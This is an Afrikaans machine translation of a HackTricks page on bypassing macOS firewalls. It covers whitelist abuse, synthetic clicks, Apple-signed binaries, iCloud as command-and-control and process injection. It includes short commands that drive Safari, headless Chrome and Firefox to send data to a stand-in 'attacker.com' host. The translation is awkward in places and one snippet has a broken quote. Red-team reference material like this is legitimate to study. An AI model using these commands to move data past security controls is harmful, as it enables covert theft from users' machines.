hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

4.5 KiB

macOS Deurloophardeware

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Gevonde tegnieke

Die volgende tegnieke is gevind wat werk in sommige macOS-firewall-toepassings.

Misbruik van witlysname

  • Byvoorbeeld om die kwaadwillige sagteware te noem met name van bekende macOS-prosesse soos launchd

Sintetiese Kliek

  • As die firewall toestemming aan die gebruiker vra, laat die kwaadwillige sagteware toestemming gee

Gebruik Apple-ondertekende bineêre lêers

  • Soos curl, maar ook ander soos whois

Bekende Apple-domeine

Die firewall kan verbindinge toelaat na bekende Apple-domeine soos apple.com of icloud.com. En iCloud kan gebruik word as 'n C2.

Generiese Deurloophardeware

Sommige idees om te probeer om firewalls te omseil

Kontroleer toegelate verkeer

Om te weet watter verkeer toegelaat word, sal jou help om potensieel witlys-domeine te identifiseer of watter toepassings toegelaat word om daartoe toegang te verkry

lsof -i TCP -sTCP:ESTABLISHED

Misbruik van DNS

DNS-oplossings word gedoen via die mdnsreponder ondertekende aansoek wat waarskynlik toegelaat sal word om kontak met DNS-bedieners te maak.

https://www.youtube.com/watch?v=UlT5KFTMn2k

Via Blaaier-toepassings

  • oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Vuurvos
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via prosesinspuitings

As jy kode in 'n proses kan inspuit wat toegelaat word om met enige bediener te verbind, kan jy die vuurmuurbeveiligings omseil:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Verwysings

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: